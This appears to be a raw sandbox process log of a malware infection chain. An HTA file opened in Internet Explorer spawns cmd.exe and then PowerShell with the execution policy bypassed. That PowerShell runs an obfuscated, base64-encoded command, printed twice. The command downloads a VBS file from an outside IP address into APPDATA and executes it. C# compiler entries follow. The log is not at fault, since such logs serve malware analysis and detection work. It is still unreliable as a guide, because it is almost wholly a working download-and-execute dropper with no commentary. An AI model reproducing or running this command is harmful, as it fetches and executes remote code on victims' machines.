iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\seethebestthingswithmegreatdays.hta.html
1884cmd.exe "C:\Windows\system32\cmd.exe" "/c poWERSHElL.eXe -ex bYPASs -nop -w 1 -C devIcEcredENtialdEPLoymeNT.EXe ; iEx($(iEX('[SysTem.TEXT.encOdING]'+[cHaR]58+[char]0x3A+'utf8.GetsTring([sYSTeM.CONvErt]'+[cHar]0X3A+[ChAR]58+'froMBaSE64STRiNg('+[Char]34+'JDdwV281R0xJNyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1CRVJERUZJbklUSW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUG1aTlB0QUhibSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1VWix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMZkhULEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZXNaVHApOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYU5oIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN3BXbzVHTEk3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTg1LjI5LjExLjExMS80NTUvbmljZXBjaXR1cmV3aXRoZ3JlYXRwZXJzb25lbnRpcmV0aW1lLnRJRiIsIiRlTlY6QVBQREFUQVxuaWNlcGNpdHVyZXdpdGhncmVhdHBlcnNvbmVudGlyZXRpbWUudmJzIiwwLDApO1N0QVJ0LVNMZWVQKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXG5pY2VwY2l0dXJld2l0aGdyZWF0cGVyc29uZW50aXJldGltZS52YnMi'+[cHar]0X22+'))')))"
1220powershell.exe poWERSHElL.eXe -ex bYPASs -nop -w 1 -C devIcEcredENtialdEPLoymeNT.EXe ; iEx($(iEX('[SysTem.TEXT.encOdING]'+[cHaR]58+[char]0x3A+'utf8.GetsTring([sYSTeM.CONvErt]'+[cHar]0X3A+[ChAR]58+'froMBaSE64STRiNg('+[Char]34+'JDdwV281R0xJNyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1CRVJERUZJbklUSW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUG1aTlB0QUhibSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1VWix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMZkhULEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZXNaVHApOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYU5oIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN3BXbzVHTEk3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTg1LjI5LjExLjExMS80NTUvbmljZXBjaXR1cmV3aXRoZ3JlYXRwZXJzb25lbnRpcmV0aW1lLnRJRiIsIiRlTlY6QVBQREFUQVxuaWNlcGNpdHVyZXdpdGhncmVhdHBlcnNvbmVudGlyZXRpbWUudmJzIiwwLDApO1N0QVJ0LVNMZWVQKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXG5pY2VwY2l0dXJld2l0aGdyZWF0cGVyc29uZW50aXJldGltZS52YnMi'+[cHar]0X22+'))')))"
2132csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\0lmkrb0q.cmdline"
2280cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES4405.tmp" "c:\Users\test22\AppData\Local\Temp\CSC4397.tmp"
964